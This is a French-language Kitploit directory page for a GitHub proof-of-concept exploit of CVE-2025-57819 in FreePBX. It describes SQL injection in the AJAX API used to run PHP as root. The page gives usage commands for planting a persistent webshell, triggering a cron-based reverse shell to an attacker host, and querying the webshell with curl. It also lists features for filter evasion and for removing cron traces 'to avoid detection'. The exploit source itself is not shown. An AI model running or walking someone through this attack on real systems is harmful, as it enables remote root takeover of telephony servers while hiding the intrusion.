Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5781 — Exploit de preuve de concept pour CVE-2025-57819 dans FreePBX : injection SQL dans l'API AJAX pour exécuter du PHP arbitraire, créer un webshell persistant et déclencher un reverse shell. | Kitploit
Outils/GitHubGitHub/jasonbernier/cve-2025-5781
Mécanismes de PersistanceExploitationExploitation d'Applications WebPost-ExploitationCommandement et ContrôleDéveloppement de Charges Utiles
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Exploit de preuve de concept pour CVE-2025-57819 dans FreePBX : injection SQL dans l'API AJAX pour exécuter du PHP arbitraire, créer un webshell persistant et déclencher un reverse shell.

Voir le dépôt
il y a 9 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit FreePBX CVE-2025-57819

Description

Ce script exploite une vulnérabilité dans les versions de FreePBX antérieures à 16.0.26.0 (CVE-2025-57819), permettant à des attaquants distants d'exécuter du code PHP arbitraire via une faille d'injection SQL dans l'endpoint de l'API AJAX. L'exploit crée à la fois un webshell et un reverse shell à déclenchement automatique.

Détails de la vulnérabilité

  • CVE : CVE-2025-57819
  • Versions affectées : FreePBX < 16.0.26.0
  • Impact : Exécution de code à distance (RCE)
  • Vecteur : Injection SQL dans l'API AJAX (/admin/ajax.php)

Fonctionnalités

  • Crée un webshell persistant à /pbxshell.php
  • Met en place un reverse shell à déclenchement automatique via une tâche cron
  • Utilise des payloads encodés en Base64 pour contourner les filtres
  • Nettoyage automatique des tâches cron après l'exécution

Prérequis

  • Python 3.x
  • Bibliothèque requests
  • Netcat (pour l'écoute du reverse shell)

Installation

root@kitploit:~
git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

Utilisation

root@kitploit:~
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

Paramètres :

  • -H HOST : Instance FreePBX cible (p. ex., https://freepbx.example.com)
  • -lhost LHOST : Votre IP pour le rappel du reverse shell
  • -lport LPORT : Port pour la connexion du reverse shell

Exemple :

root@kitploit:~
python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

Déroulement de l'exploit

  1. Envoie une charge utile d'injection SQL pour créer un webshell
  2. Attend la création du webshell (~2 minutes)
  3. Crée un reverse shell à déclenchement automatique via une tâche cron
  4. Démarre un listener netcat sur le port spécifié

Utilisation du webshell

Après une exploitation réussie, accédez au webshell via :

root@kitploit:~
curl -X GET "http://TARGET/pbxshell.php?cmd=id"

Nettoyage

L'exploit supprime automatiquement les tâches cron après l'exécution pour éviter toute détection.

Remarques

  • Le script utilise -- pour commenter la syntaxe SQL restante
  • Toutes les commandes sont exécutées avec les privilèges root
  • Nécessite un accès en écriture au répertoire /var/www/html/

Références

  • CVE-2025-57819
  • Avis de sécurité FreePBX
Télécharger l’outil